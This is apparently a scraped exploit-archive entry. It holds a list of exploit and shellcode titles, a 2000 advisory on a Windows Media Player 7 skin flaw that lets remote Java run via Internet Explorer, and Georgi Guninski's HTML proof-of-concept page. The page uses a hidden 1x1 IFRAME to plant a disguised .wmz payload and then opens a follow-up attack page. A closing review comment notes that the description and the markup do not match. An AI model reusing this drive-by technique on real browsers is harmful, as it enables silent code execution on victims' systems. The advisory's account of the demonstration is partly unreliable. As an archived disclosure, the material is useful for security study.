
14991 changes to exploits/shellcodes HTC Touch - vCard over IP Denial of Service TeamSpeak 3.0.0-beta25 - Multiple Vulnerabilities PeerBlock 1.1 - Blue Screen of Death WS10 Data Server - SCADA Overflow (PoC) Symantec Endpoint Protection 12.1.4013 - Service Disabling Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow man-db 2.4.1 - 'open_cat_stream()' Local uid=man CDRecord's ReadCD - '$RSH exec()' SUID Shell Creation CDRecord's ReadCD - Local Privilege Escalation Anyburn 4.3 x86 - 'Copy disc to image file' Buffer Overflow (Unicode) (SEH) FreeBSD - Intel SYSRET Privilege Escalation (Metasploit) CCProxy 6.2 - 'ping' Remote Buffer Overflow Savant Web Server 3.1 - Remote Buffer Overflow (2) Litespeed Web Server 4.0.17 with PHP (FreeBSD) - Remote Overflow Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow QNAP TS-431 QTS < 4.2.2 - Remote Command Execution (Metasploit) Imperva SecureSphere 13.x - 'PWS' Command Injection (Metasploit) Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit) Oracle Weblogic Server - Deserialization Remote Command Execution (Patch Bypass) TeamCity < 9.0.2 - Disabled Registration Bypass OpenSSH SCP Client - Write Arbitrary Files Kados R10 GreenBee - Multiple SQL Injection WordPress Core 5.0 - Remote Code Execution phpBB 3.2.3 - Remote Code Execution Linux/x86 - Create File With Permission 7775 + exit() Shellcode (Generator) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 
bytes) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
63 lines
No EOL
2.7 KiB
HTML
source: https://www.securityfocus.com/bid/2203/info
A vulnerability has been reported in Microsoft Windows Media Player 7 which is exploitable through Internet Explorer and Java.
Skins are downloadable files which change the appearance of a program's user interface. Skins for Windows Media Player are installed to a known location: "C:/Program files/Windows Media Player/Skins/skin.wmz".
As a result, a remote HTML document, visited by the victim user, can lead the user's browser to download an arbitrary file matching the the name 'skin.wmz' to this known location.
A malicious remote user could exploit this to upload a file containing executable java code disguised as a Windows Media Player skin file.
An applet tag in the remote HTML document can then execute the 'skin.wmz' file as Java code. Properly exploited, this could provide an attacker with complete control of the vulnerable system. On multiuser Windows NT or 2000 systems, this vulnerability can only provide the attacker with access to the system that is within the security context of the user who was exploited.
<HTML>
<HEAD>
<TITLE>
Windows Media Player 7 and IE java vulnerability - executing arbitrary programs
</TITLE>
</HEAD>
<BODY>
<H3>
Windows Media Player 7 and IE java vulnerability - executing arbitrary programs
</H3>
<BR>
<p>Legal Notice:
<br>This Advisory and Demonstration is Copyright (c) 2000 Georgi Guninski. You may distribute
it unmodified. You may not modify it and distribute it or distribute parts
of it without the author's written permission.
<p>Disclaimer:
<br>The opinions expressed in this advisory and program are my own and
not of any company.
<br>The usual standard disclaimer applies, especially the fact that Georgi
Guninski
<br>is not liable for any damages caused by direct or indirect use
of the information or functionality provided by this advisory or program.
<br>Georgi Guninski, bears no responsibility for content or misuse of this
advisory or program or any derivatives thereof.
<BR>
Read the <A HREF="wmp7-3-desc.html">Advisory</A> for more information.
<BR>
Wait a few seconds and a window will be opened.
<BR>
<IFRAME SRC="wmp2.wmz" WIDTH=1 HEIGHT=1></IFRAME>
<SCRIPT>
function f()
{
window.open("wmp7-3a.html");
}
setTimeout("f()",4000);
</SCRIPT>
<BR>
<center>(C) Copyright 2000 Georgi Guninski</center>
<BR>
<center>
| <a href="http://www.guninski.com">Home</a> |
<a href="browsers.html">Internet Explorer</a> |
<a href="win2k.html">Windows 2000</a> |
<a href="exploit.html">AIX</a> |
<a href="netscape.html">Netscape</a> |
<a href="greets.html">Greets</a> |
<a href="index.html">More...</a> |
</center>
</BODY>
</HTML>
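Review bot: The header text and the markup disagree on the file name: the description says the file arrives as 'skin.wmz', while the IFRAME in the body loads "wmp2.wmz". The header also describes an applet tag, but this file contains none; it only opens "wmp7-3a.html" after 4000 ms, and that page, "wmp2.wmz" and "wmp7-3-desc.html" are relative references that are not part of this entry. Suggest a header line stating that this is only the first page of the demonstration and naming the referenced files that are absent, so a reader does not take the description as matching the markup. Smaller points: the paragraph beginning "As a result" has a doubled "the the", and the listing reports "No EOL", so the file should end with a newline.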